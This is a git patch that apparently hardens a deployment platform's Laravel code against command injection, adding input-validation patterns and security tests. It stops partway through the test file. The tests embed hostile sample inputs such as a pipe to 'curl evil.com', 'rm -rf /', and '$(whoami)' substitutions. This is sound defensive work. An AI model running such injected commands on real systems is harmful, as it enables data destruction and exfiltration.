Subject: [PATCH 084/213] Squashed commit from
 'qqrq-r9h4-x6wp-authenticated-rce'

---
 .../Api/ApplicationsController.php            |   4 +-
 app/Jobs/ApplicationDeploymentJob.php         |  47 ++-
 app/Livewire/Project/Application/General.php  |  78 ++--
 app/Support/ValidationPatterns.php            |  62 ++-
 bootstrap/helpers/api.php                     |  21 +-
 .../project/application/general.blade.php     |   8 +-
 .../Feature/CommandInjectionSecurityTest.php  | 363 ++++++++++++++++++
 7 files changed, 507 insertions(+), 76 deletions(-)

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index 6188651a1..6f34b43bf 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -2472,7 +2472,7 @@ public function update_by_uuid(Request $request)
         $this->authorize('update', $application);
 
         $server = $application->destination->server;
-        $allowedFields = ['name', 'description', 'is_static', 'is_spa', 'is_auto_deploy_enabled', 'is_force_https_enabled', 'domains', 'git_repository', 'git_branch', 'git_commit_sha', 'docker_registry_image_name', 'docker_registry_image_tag', 'build_pack', 'static_image', 'install_command', 'build_command', 'start_command', 'ports_exposes', 'ports_mappings', 'custom_network_aliases', 'base_directory', 'publish_directory', 'health_check_enabled', 'health_check_type', 'health_check_command', 'health_check_path', 'health_check_port', 'health_check_host', 'health_check_method', 'health_check_return_code', 'health_check_scheme', 'health_check_response_text', 'health_check_interval', 'health_check_timeout', 'health_check_retries', 'health_check_start_period', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'custom_labels', 'custom_docker_run_options', 'post_deployment_command', 'post_deployment_command_container', 'pre_deployment_command', 'pre_deployment_command_container', 'watch_paths', 'manual_webhook_secret_github', 'manual_webhook_secret_gitlab', 'manual_webhook_secret_bitbucket', 'manual_webhook_secret_gitea', 'dockerfile_location', 'docker_compose_location', 'docker_compose_custom_start_command', 'docker_compose_custom_build_command', 'docker_compose_domains', 'redirect', 'instant_deploy', 'use_build_server', 'custom_nginx_configuration', 'is_http_basic_auth_enabled', 'http_basic_auth_username', 'http_basic_auth_password', 'connect_to_docker_network', 'force_domain_override', 'is_container_label_escape_enabled'];
+        $allowedFields = ['name', 'description', 'is_static', 'is_spa', 'is_auto_deploy_enabled', 'is_force_https_enabled', 'domains', 'git_repository', 'git_branch', 'git_commit_sha', 'docker_registry_image_name', 'docker_registry_image_tag', 'build_pack', 'static_image', 'install_command', 'build_command', 'start_command', 'ports_exposes', 'ports_mappings', 'custom_network_aliases', 'base_directory', 'publish_directory', 'health_check_enabled', 'health_check_type', 'health_check_command', 'health_check_path', 'health_check_port', 'health_check_host', 'health_check_method', 'health_check_return_code', 'health_check_scheme', 'health_check_response_text', 'health_check_interval', 'health_check_timeout', 'health_check_retries', 'health_check_start_period', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'custom_labels', 'custom_docker_run_options', 'post_deployment_command', 'post_deployment_command_container', 'pre_deployment_command', 'pre_deployment_command_container', 'watch_paths', 'manual_webhook_secret_github', 'manual_webhook_secret_gitlab', 'manual_webhook_secret_bitbucket', 'manual_webhook_secret_gitea', 'dockerfile_location', 'dockerfile_target_build', 'docker_compose_location', 'docker_compose_custom_start_command', 'docker_compose_custom_build_command', 'docker_compose_domains', 'redirect', 'instant_deploy', 'use_build_server', 'custom_nginx_configuration', 'is_http_basic_auth_enabled', 'http_basic_auth_username', 'http_basic_auth_password', 'connect_to_docker_network', 'force_domain_override', 'is_container_label_escape_enabled'];
 
         $validationRules = [
             'name' => 'string|max:255',
@@ -2483,8 +2483,6 @@ public function update_by_uuid(Request $request)
             'docker_compose_domains.*' => 'array:name,domain',
             'docker_compose_domains.*.name' => 'string|required',
             'docker_compose_domains.*.domain' => 'string|nullable',
-            'docker_compose_custom_start_command' => 'string|nullable',
-            'docker_compose_custom_build_command' => 'string|nullable',
             'custom_nginx_configuration' => 'string|nullable',
             'is_http_basic_auth_enabled' => 'boolean|nullable',
             'http_basic_auth_username' => 'string',
diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 7adb938c5..ed77b7c67 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -223,7 +223,11 @@ public function __construct(public int $application_deployment_queue_id)
         $this->preserveRepository = $this->application->settings->is_preserve_repository_enabled;
 
         $this->basedir = $this->application->generateBaseDir($this->deployment_uuid);
-        $this->workdir = "{$this->basedir}".rtrim($this->application->base_directory, '/');
+        $baseDir = $this->application->base_directory;
+        if ($baseDir && $baseDir !== '/') {
+            $this->validatePathField($baseDir, 'base_directory');
+        }
+        $this->workdir = "{$this->basedir}".rtrim($baseDir, '/');
         $this->configuration_dir = application_configuration_dir()."/{$this->application->uuid}";
         $this->is_debug_enabled = $this->application->settings->is_debug_enabled;
 
@@ -312,7 +316,11 @@ public function handle(): void
             }
 
             if ($this->application->dockerfile_target_build) {
-                $this->buildTarget = " --target {$this->application->dockerfile_target_build} ";
+                $target = $this->application->dockerfile_target_build;
+                if (! preg_match(\App\Support\ValidationPatterns::DOCKER_TARGET_PATTERN, $target)) {
+                    throw new \RuntimeException('Invalid dockerfile_target_build: contains forbidden characters.');
+                }
+                $this->buildTarget = " --target {$target} ";
             }
 
             // Check custom port
@@ -571,6 +579,7 @@ private function deploy_docker_compose_buildpack()
             $this->docker_compose_location = $this->validatePathField($this->application->docker_compose_location, 'docker_compose_location');
         }
         if (data_get($this->application, 'docker_compose_custom_start_command')) {
+            $this->validateShellSafeCommand($this->application->docker_compose_custom_start_command, 'docker_compose_custom_start_command');
             $this->docker_compose_custom_start_command = $this->application->docker_compose_custom_start_command;
             if (! str($this->docker_compose_custom_start_command)->contains('--project-directory')) {
                 $projectDir = $this->preserveRepository ? $this->application->workdir() : $this->workdir;
@@ -578,6 +587,7 @@ private function deploy_docker_compose_buildpack()
             }
         }
         if (data_get($this->application, 'docker_compose_custom_build_command')) {
+            $this->validateShellSafeCommand($this->application->docker_compose_custom_build_command, 'docker_compose_custom_build_command');
             $this->docker_compose_custom_build_command = $this->application->docker_compose_custom_build_command;
             if (! str($this->docker_compose_custom_build_command)->contains('--project-directory')) {
                 $this->docker_compose_custom_build_command = str($this->docker_compose_custom_build_command)->replaceFirst('compose', 'compose --project-directory '.$this->workdir)->value();
@@ -3948,6 +3958,24 @@ private function validatePathField(string $value, string $fieldName): string
         return $value;
     }
 
+    private function validateShellSafeCommand(string $value, string $fieldName): string
+    {
+        if (! preg_match(\App\Support\ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN, $value)) {
+            throw new \RuntimeException("Invalid {$fieldName}: contains forbidden shell characters.");
+        }
+
+        return $value;
+    }
+
+    private function validateContainerName(string $value): string
+    {
+        if (! preg_match(\App\Support\ValidationPatterns::CONTAINER_NAME_PATTERN, $value)) {
+            throw new \RuntimeException('Invalid container name: contains forbidden characters.');
+        }
+
+        return $value;
+    }
+
     private function run_pre_deployment_command()
     {
         if (empty($this->application->pre_deployment_command)) {
@@ -3961,7 +3989,17 @@ private function run_pre_deployment_command()
 
         foreach ($containers as $container) {
             $containerName = data_get($container, 'Names');
+            if ($containerName) {
+                $this->validateContainerName($containerName);
+            }
             if ($containers->count() == 1 || str_starts_with($containerName, $this->application->pre_deployment_command_container.'-'.$this->application->uuid)) {
+                // Security: pre_deployment_command is intentionally treated as arbitrary shell input.
+                // Users (team members with deployment access) need full shell flexibility to run commands
+                // like "php artisan migrate", "npm run build", etc. inside their own application containers.
+                // The trust boundary is at the application/team ownership level — only authenticated team
+                // members can set these commands, and execution is scoped to the application's own container.
+                // The single-quote escaping here prevents breaking out of the sh -c wrapper, but does not
+                // restrict the command itself. Container names are validated separately via validateContainerName().
                 $cmd = "sh -c '".str_replace("'", "'\''", $this->application->pre_deployment_command)."'";
                 $exec = "docker exec {$containerName} {$cmd}";
                 $this->execute_remote_command(
@@ -3988,7 +4026,12 @@ private function run_post_deployment_command()
         $containers = getCurrentApplicationContainerStatus($this->server, $this->application->id, $this->pull_request_id);
         foreach ($containers as $container) {
             $containerName = data_get($container, 'Names');
+            if ($containerName) {
+                $this->validateContainerName($containerName);
+            }
             if ($containers->count() == 1 || str_starts_with($containerName, $this->application->post_deployment_command_container.'-'.$this->application->uuid)) {
+                // Security: post_deployment_command is intentionally treated as arbitrary shell input.
+                // See the equivalent comment in run_pre_deployment_command() for the full security rationale.
                 $cmd = "sh -c '".str_replace("'", "'\''", $this->application->post_deployment_command)."'";
                 $exec = "docker exec {$containerName} {$cmd}";
                 try {
diff --git a/app/Livewire/Project/Application/General.php b/app/Livewire/Project/Application/General.php
index b3fe99806..ca1daef72 100644
--- a/app/Livewire/Project/Application/General.php
+++ b/app/Livewire/Project/Application/General.php
@@ -7,7 +7,6 @@
 use App\Support\ValidationPatterns;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Illuminate\Support\Collection;
-use Livewire\Attributes\Validate;
 use Livewire\Component;
 use Spatie\Url\Url;
 use Visus\Cuid2\Cuid2;
@@ -22,136 +21,95 @@ class General extends Component
 
     public Collection $services;
 
-    #[Validate('required|regex:/^[a-zA-Z0-9\s\-_.\/:()]+$/')]
     public string $name;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $description = null;
 
-    #[Validate(['nullable'])]
     public ?string $fqdn = null;
 
-    #[Validate(['required'])]
     public string $gitRepository;
 
-    #[Validate(['required'])]
     public string $gitBranch;
 
-    #[Validate(['string', 'nullable', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._\-\/]*$/'])]
     public ?string $gitCommitSha = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $installCommand = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $buildCommand = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $startCommand = null;
 
-    #[Validate(['required'])]
     public string $buildPack;
 
-    #[Validate(['required'])]
     public string $staticImage;
 
-    #[Validate(['required'])]
     public string $baseDirectory;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $publishDirectory = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $portsExposes = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $portsMappings = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $customNetworkAliases = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $dockerfile = null;
 
-    #[Validate(['string', 'nullable', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/~@+]+$/'])]
     public ?string $dockerfileLocation = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $dockerfileTargetBuild = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $dockerRegistryImageName = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $dockerRegistryImageTag = null;
 
-    #[Validate(['string', 'nullable', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/~@+]+$/'])]
     public ?string $dockerComposeLocation = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $dockerCompose = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $dockerComposeRaw = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $dockerComposeCustomStartCommand = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $dockerComposeCustomBuildCommand = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $customDockerRunOptions = null;
 
-    #[Validate(['string', 'nullable'])]
+    // Security: pre/post deployment commands are intentionally arbitrary shell — users need full
+    // flexibility (e.g. "php artisan migrate"). Access is gated by team authentication/authorization.
+    // Commands execute inside the application's own container, not on the host.
     public ?string $preDeploymentCommand = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $preDeploymentCommandContainer = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $postDeploymentCommand = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $postDeploymentCommandContainer = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $customNginxConfiguration = null;
 
-    #[Validate(['boolean', 'required'])]
     public bool $isStatic = false;
 
-    #[Validate(['boolean', 'required'])]
     public bool $isSpa = false;
 
-    #[Validate(['boolean', 'required'])]
     public bool $isBuildServerEnabled = false;
 
-    #[Validate(['boolean', 'required'])]
     public bool $isPreserveRepositoryEnabled = false;
 
-    #[Validate(['boolean', 'required'])]
     public bool $isContainerLabelEscapeEnabled = true;
 
-    #[Validate(['boolean', 'required'])]
     public bool $isContainerLabelReadonlyEnabled = false;
 
-    #[Validate(['boolean', 'required'])]
     public bool $isHttpBasicAuthEnabled = false;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $httpBasicAuthUsername = null;
 
-    #[Validate(['string', 'nullable'])]
     public ?string $httpBasicAuthPassword = null;
 
-    #[Validate(['nullable'])]
     public ?string $watchPaths = null;
 
-    #[Validate(['string', 'required'])]
     public string $redirect;
 
-    #[Validate(['nullable'])]
     public $customLabels;
 
     public bool $labelsChanged = false;
@@ -184,33 +142,33 @@ protected function rules(): array
             'fqdn' => 'nullable',
             'gitRepository' => 'required',
             'gitBranch' => 'required',
-            'gitCommitSha' => ['nullable', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._\-\/]*$/'],
+            'gitCommitSha' => ['nullable', 'string', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._\-\/]*$/'],
             'installCommand' => 'nullable',
             'buildCommand' => 'nullable',
             'startCommand' => 'nullable',
             'buildPack' => 'required',
             'staticImage' => 'required',
-            'baseDirectory' => 'required',
-            'publishDirectory' => 'nullable',
+            'baseDirectory' => array_merge(['required'], array_slice(ValidationPatterns::directoryPathRules(), 1)),
+            'publishDirectory' => ValidationPatterns::directoryPathRules(),
             'portsExposes' => 'required',
             'portsMappings' => 'nullable',
             'customNetworkAliases' => 'nullable',
             'dockerfile' => 'nullable',
             'dockerRegistryImageName' => 'nullable',
             'dockerRegistryImageTag' => 'nullable',
-            'dockerfileLocation' => ['nullable', 'regex:'.ValidationPatterns::FILE_PATH_PATTERN],
-            'dockerComposeLocation' => ['nullable', 'regex:'.ValidationPatterns::FILE_PATH_PATTERN],
+            'dockerfileLocation' => ValidationPatterns::filePathRules(),
+            'dockerComposeLocation' => ValidationPatterns::filePathRules(),
             'dockerCompose' => 'nullable',
             'dockerComposeRaw' => 'nullable',
-            'dockerfileTargetBuild' => 'nullable',
-            'dockerComposeCustomStartCommand' => 'nullable',
-            'dockerComposeCustomBuildCommand' => 'nullable',
+            'dockerfileTargetBuild' => ValidationPatterns::dockerTargetRules(),
+            'dockerComposeCustomStartCommand' => ValidationPatterns::shellSafeCommandRules(),
+            'dockerComposeCustomBuildCommand' => ValidationPatterns::shellSafeCommandRules(),
             'customLabels' => 'nullable',
-            'customDockerRunOptions' => 'nullable',
+            'customDockerRunOptions' => ValidationPatterns::shellSafeCommandRules(2000),
             'preDeploymentCommand' => 'nullable',
-            'preDeploymentCommandContainer' => 'nullable',
+            'preDeploymentCommandContainer' => ['nullable', ...ValidationPatterns::containerNameRules()],
             'postDeploymentCommand' => 'nullable',
-            'postDeploymentCommandContainer' => 'nullable',
+            'postDeploymentCommandContainer' => ['nullable', ...ValidationPatterns::containerNameRules()],
             'customNginxConfiguration' => 'nullable',
             'isStatic' => 'boolean|required',
             'isSpa' => 'boolean|required',
@@ -233,6 +191,14 @@ protected function messages(): array
             [
                 ...ValidationPatterns::filePathMessages('dockerfileLocation', 'Dockerfile'),
                 ...ValidationPatterns::filePathMessages('dockerComposeLocation', 'Docker Compose'),
+                'baseDirectory.regex' => 'The base directory must be a valid path starting with / and containing only safe characters.',
+                'publishDirectory.regex' => 'The publish directory must be a valid path starting with / and containing only safe characters.',
+                'dockerfileTargetBuild.regex' => 'The Dockerfile target build must contain only alphanumeric characters, dots, hyphens, and underscores.',
+                'dockerComposeCustomStartCommand.regex' => 'The Docker Compose start command contains invalid characters. Shell operators like ;, &, |, $, and backticks are not allowed.',
+                'dockerComposeCustomBuildCommand.regex' => 'The Docker Compose build command contains invalid characters. Shell operators like ;, &, |, $, and backticks are not allowed.',
+                'customDockerRunOptions.regex' => 'The custom Docker run options contain invalid characters. Shell operators like ;, &, |, $, and backticks are not allowed.',
+                'preDeploymentCommandContainer.regex' => 'The pre-deployment command container name must contain only alphanumeric characters, dots, hyphens, and underscores.',
+                'postDeploymentCommandContainer.regex' => 'The post-deployment command container name must contain only alphanumeric characters, dots, hyphens, and underscores.',
                 'name.required' => 'The Name field is required.',
                 'gitRepository.required' => 'The Git Repository field is required.',
                 'gitBranch.required' => 'The Git Branch field is required.',
diff --git a/app/Support/ValidationPatterns.php b/app/Support/ValidationPatterns.php
index 2ae1536da..fdf2b12a6 100644
--- a/app/Support/ValidationPatterns.php
+++ b/app/Support/ValidationPatterns.php
@@ -9,7 +9,7 @@ class ValidationPatterns
 {
     /**
      * Pattern for names excluding all dangerous characters
-    */
+     */
     public const NAME_PATTERN = '/^[\p{L}\p{M}\p{N}\s\-_.@\/&]+$/u';
 
     /**
@@ -23,6 +23,32 @@ class ValidationPatterns
      */
     public const FILE_PATH_PATTERN = '/^\/[a-zA-Z0-9._\-\/~@+]+$/';
 
+    /**
+     * Pattern for directory paths (base_directory, publish_directory, etc.)
+     * Like FILE_PATH_PATTERN but also allows bare "/" (root directory)
+     */
+    public const DIRECTORY_PATH_PATTERN = '/^\/([a-zA-Z0-9._\-\/~@+]*)?$/';
+
+    /**
+     * Pattern for Docker build target names (multi-stage build stage names)
+     * Allows alphanumeric, dots, hyphens, and underscores
+     */
+    public const DOCKER_TARGET_PATTERN = '/^[a-zA-Z0-9][a-zA-Z0-9._-]*$/';
+
+    /**
+     * Pattern for shell-safe command strings (docker compose commands, docker run options)
+     * Blocks dangerous shell metacharacters: ; & | ` $ ( ) > < newlines and carriage returns
+     * Also blocks backslashes, single quotes, and double quotes to prevent escape-sequence attacks
+     * Uses [ \t] instead of \s to explicitly exclude \n and \r (which act as command separators)
+     */
+    public const SHELL_SAFE_COMMAND_PATTERN = '/^[a-zA-Z0-9 \t._\-\/=:@,+\[\]{}#%^~]+$/';
+
+    /**
+     * Pattern for Docker container names
+     * Must start with alphanumeric, followed by alphanumeric, dots, hyphens, or underscores
+     */
+    public const CONTAINER_NAME_PATTERN = '/^[a-zA-Z0-9][a-zA-Z0-9._-]*$/';
+
     /**
      * Get validation rules for name fields
      */
@@ -70,7 +96,7 @@ public static function descriptionRules(bool $required = false, int $maxLength =
     public static function nameMessages(): array
     {
         return [
-            'name.regex' => "The name may only contain letters (including Unicode), numbers, spaces, and these characters: - _ . / @ &",
+            'name.regex' => 'The name may only contain letters (including Unicode), numbers, spaces, and these characters: - _ . / @ &',
             'name.min' => 'The name must be at least :min characters.',
             'name.max' => 'The name may not be greater than :max characters.',
         ];
@@ -105,6 +131,38 @@ public static function filePathMessages(string $field = 'dockerfileLocation', st
         ];
     }
 
+    /**
+     * Get validation rules for directory path fields (base_directory, publish_directory)
+     */
+    public static function directoryPathRules(int $maxLength = 255): array
+    {
+        return ['nullable', 'string', 'max:'.$maxLength, 'regex:'.self::DIRECTORY_PATH_PATTERN];
+    }
+
+    /**
+     * Get validation rules for Docker build target fields
+     */
+    public static function dockerTargetRules(int $maxLength = 128): array
+    {
+        return ['nullable', 'string', 'max:'.$maxLength, 'regex:'.self::DOCKER_TARGET_PATTERN];
+    }
+
+    /**
+     * Get validation rules for shell-safe command fields
+     */
+    public static function shellSafeCommandRules(int $maxLength = 1000): array
+    {
+        return ['nullable', 'string', 'max:'.$maxLength, 'regex:'.self::SHELL_SAFE_COMMAND_PATTERN];
+    }
+
+    /**
+     * Get validation rules for container name fields
+     */
+    public static function containerNameRules(int $maxLength = 255): array
+    {
+        return ['string', 'max:'.$maxLength, 'regex:'.self::CONTAINER_NAME_PATTERN];
+    }
+
     /**
      * Get combined validation messages for both name and description fields
      */
diff --git a/bootstrap/helpers/api.php b/bootstrap/helpers/api.php
index 43c074cd1..ec42761f7 100644
--- a/bootstrap/helpers/api.php
+++ b/bootstrap/helpers/api.php
@@ -101,8 +101,8 @@ function sharedDataApplications()
         'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/',
         'ports_mappings' => 'string|regex:/^(\d+:\d+)(,\d+:\d+)*$/|nullable',
         'custom_network_aliases' => 'string|nullable',
-        'base_directory' => 'string|nullable',
-        'publish_directory' => 'string|nullable',
+        'base_directory' => \App\Support\ValidationPatterns::directoryPathRules(),
+        'publish_directory' => \App\Support\ValidationPatterns::directoryPathRules(),
         'health_check_enabled' => 'boolean',
         'health_check_type' => 'string|in:http,cmd',
         'health_check_command' => ['nullable', 'string', 'max:1000', 'regex:/^[a-zA-Z0-9 \-_.\/:=@,+]+$/'],
@@ -125,21 +125,24 @@ function sharedDataApplications()
         'limits_cpuset' => 'string|nullable',
         'limits_cpu_shares' => 'numeric',
         'custom_labels' => 'string|nullable',
-        'custom_docker_run_options' => 'string|nullable',
+        'custom_docker_run_options' => \App\Support\ValidationPatterns::shellSafeCommandRules(2000),
+        // Security: deployment commands are intentionally arbitrary shell (e.g. "php artisan migrate").
+        // Access is gated by API token authentication. Commands run inside the app container, not the host.
         'post_deployment_command' => 'string|nullable',
-        'post_deployment_command_container' => 'string',
+        'post_deployment_command_container' => \App\Support\ValidationPatterns::containerNameRules(),
         'pre_deployment_command' => 'string|nullable',
-        'pre_deployment_command_container' => 'string',
+        'pre_deployment_command_container' => \App\Support\ValidationPatterns::containerNameRules(),
         'manual_webhook_secret_github' => 'string|nullable',
         'manual_webhook_secret_gitlab' => 'string|nullable',
         'manual_webhook_secret_bitbucket' => 'string|nullable',
         'manual_webhook_secret_gitea' => 'string|nullable',
-        'dockerfile_location' => ['string', 'nullable', 'max:255', 'regex:'.\App\Support\ValidationPatterns::FILE_PATH_PATTERN],
-        'docker_compose_location' => ['string', 'nullable', 'max:255', 'regex:'.\App\Support\ValidationPatterns::FILE_PATH_PATTERN],
+        'dockerfile_location' => \App\Support\ValidationPatterns::filePathRules(),
+        'dockerfile_target_build' => \App\Support\ValidationPatterns::dockerTargetRules(),
+        'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
         'docker_compose' => 'string|nullable',
         'docker_compose_domains' => 'array|nullable',
-        'docker_compose_custom_start_command' => 'string|nullable',
-        'docker_compose_custom_build_command' => 'string|nullable',
+        'docker_compose_custom_start_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
+        'docker_compose_custom_build_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
         'is_container_label_escape_enabled' => 'boolean',
     ];
 }
diff --git a/resources/views/livewire/project/application/general.blade.php b/resources/views/livewire/project/application/general.blade.php
index aada339cc..e27eda8b6 100644
--- a/resources/views/livewire/project/application/general.blade.php
+++ b/resources/views/livewire/project/application/general.blade.php
@@ -314,8 +314,8 @@ class="underline" href="https://coolify.io/docs/knowledge-base/docker/registry"
                             </div>
                         @else
                             <div x-data="{
-                                baseDir: '{{ $application->base_directory }}',
-                                dockerfileLocation: '{{ $application->dockerfile_location }}',
+                                baseDir: @entangle('baseDirectory'),
+                                dockerfileLocation: @entangle('dockerfileLocation'),
                                 normalizePath(path) {
                                     if (!path || path.trim() === '') return '/';
                                     path = path.trim();
@@ -332,11 +332,11 @@ class="underline" href="https://coolify.io/docs/knowledge-base/docker/registry"
                                     this.dockerfileLocation = this.normalizePath(this.dockerfileLocation);
                                 }
                             }" class="flex flex-col gap-2 xl:flex-row">
-                                <x-forms.input placeholder="/" wire:model.defer="baseDirectory"
+                                <x-forms.input placeholder="/"
                                     label="Base Directory" helper="Directory to use as root. Useful for monorepos."
                                     x-bind:disabled="!canUpdate" x-model="baseDir" @blur="normalizeBaseDir()" />
                                 @if ($buildPack === 'dockerfile' && !$application->dockerfile)
-                                    <x-forms.input placeholder="/Dockerfile" wire:model.defer="dockerfileLocation"
+                                    <x-forms.input placeholder="/Dockerfile"
                                         label="Dockerfile Location"
                                         helper="It is calculated together with the Base Directory:<br><span class='dark:text-warning'>{{ Str::start($application->base_directory . $application->dockerfile_location, '/') }}</span>"
                                         x-bind:disabled="!canUpdate" x-model="dockerfileLocation"
diff --git a/tests/Feature/CommandInjectionSecurityTest.php b/tests/Feature/CommandInjectionSecurityTest.php
index b2df8d1f1..12a24f42c 100644
--- a/tests/Feature/CommandInjectionSecurityTest.php
+++ b/tests/Feature/CommandInjectionSecurityTest.php
@@ -236,6 +236,369 @@
     });
 });
 
+describe('dockerfile_target_build validation', function () {
+    test('rejects shell metacharacters in dockerfile_target_build', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['dockerfile_target_build' => 'production; echo pwned'],
+            ['dockerfile_target_build' => $rules['dockerfile_target_build']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects command substitution in dockerfile_target_build', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['dockerfile_target_build' => 'builder$(whoami)'],
+            ['dockerfile_target_build' => $rules['dockerfile_target_build']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects ampersand injection in dockerfile_target_build', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['dockerfile_target_build' => 'stage && env'],
+            ['dockerfile_target_build' => $rules['dockerfile_target_build']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('allows valid target names', function ($target) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['dockerfile_target_build' => $target],
+            ['dockerfile_target_build' => $rules['dockerfile_target_build']]
+        );
+
+        expect($validator->fails())->toBeFalse();
+    })->with(['production', 'build-stage', 'stage.final', 'my_target', 'v2']);
+
+    test('runtime validates dockerfile_target_build', function () {
+        $job = new ReflectionClass(ApplicationDeploymentJob::class);
+
+        // Test that validateShellSafeCommand is also available as a pattern
+        $pattern = \App\Support\ValidationPatterns::DOCKER_TARGET_PATTERN;
+        expect(preg_match($pattern, 'production'))->toBe(1);
+        expect(preg_match($pattern, 'build; env'))->toBe(0);
+        expect(preg_match($pattern, 'target`whoami`'))->toBe(0);
+    });
+});
+
+describe('base_directory validation', function () {
+    test('rejects shell metacharacters in base_directory', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['base_directory' => '/src; echo pwned'],
+            ['base_directory' => $rules['base_directory']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects command substitution in base_directory', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['base_directory' => '/dir$(whoami)'],
+            ['base_directory' => $rules['base_directory']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('allows valid base directories', function ($dir) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['base_directory' => $dir],
+            ['base_directory' => $rules['base_directory']]
+        );
+
+        expect($validator->fails())->toBeFalse();
+    })->with(['/', '/src', '/backend/app', '/packages/@scope/app']);
+
+    test('runtime validates base_directory via validatePathField', function () {
+        $job = new ReflectionClass(ApplicationDeploymentJob::class);
+        $method = $job->getMethod('validatePathField');
+        $method->setAccessible(true);
+
+        $instance = $job->newInstanceWithoutConstructor();
+
+        expect(fn () => $method->invoke($instance, '/src; echo pwned', 'base_directory'))
+            ->toThrow(RuntimeException::class, 'contains forbidden characters');
+
+        expect($method->invoke($instance, '/src', 'base_directory'))
+            ->toBe('/src');
+    });
+});
+
+describe('docker_compose_custom_command validation', function () {
+    test('rejects semicolon injection in docker_compose_custom_start_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['docker_compose_custom_start_command' => 'docker compose up; echo pwned'],
+            ['docker_compose_custom_start_command' => $rules['docker_compose_custom_start_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects pipe injection in docker_compose_custom_build_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['docker_compose_custom_build_command' => 'docker compose build | curl evil.com'],
+            ['docker_compose_custom_build_command' => $rules['docker_compose_custom_build_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects ampersand chaining in docker_compose_custom_start_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['docker_compose_custom_start_command' => 'docker compose up && rm -rf /'],
+            ['docker_compose_custom_start_command' => $rules['docker_compose_custom_start_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects command substitution in docker_compose_custom_build_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['docker_compose_custom_build_command' => 'docker compose build $(whoami)'],
+            ['docker_compose_custom_build_command' => $rules['docker_compose_custom_build_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('allows valid docker compose commands', function ($cmd) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['docker_compose_custom_start_command' => $cmd],
+            ['docker_compose_custom_start_command' => $rules['docker_compose_custom_start_command']]
+        );
+
+        expect($validator->fails())->toBeFalse();
+    })->with([
+        'docker compose build',
+        'docker compose up -d --build',
+        'docker compose -f custom.yml build --no-cache',
+    ]);
+
+    test('rejects backslash in docker_compose_custom_start_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['docker_compose_custom_start_command' => 'docker compose up \\n curl evil.com'],
+            ['docker_compose_custom_start_command' => $rules['docker_compose_custom_start_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects single quotes in docker_compose_custom_start_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['docker_compose_custom_start_command' => "docker compose up -d --build 'malicious'"],
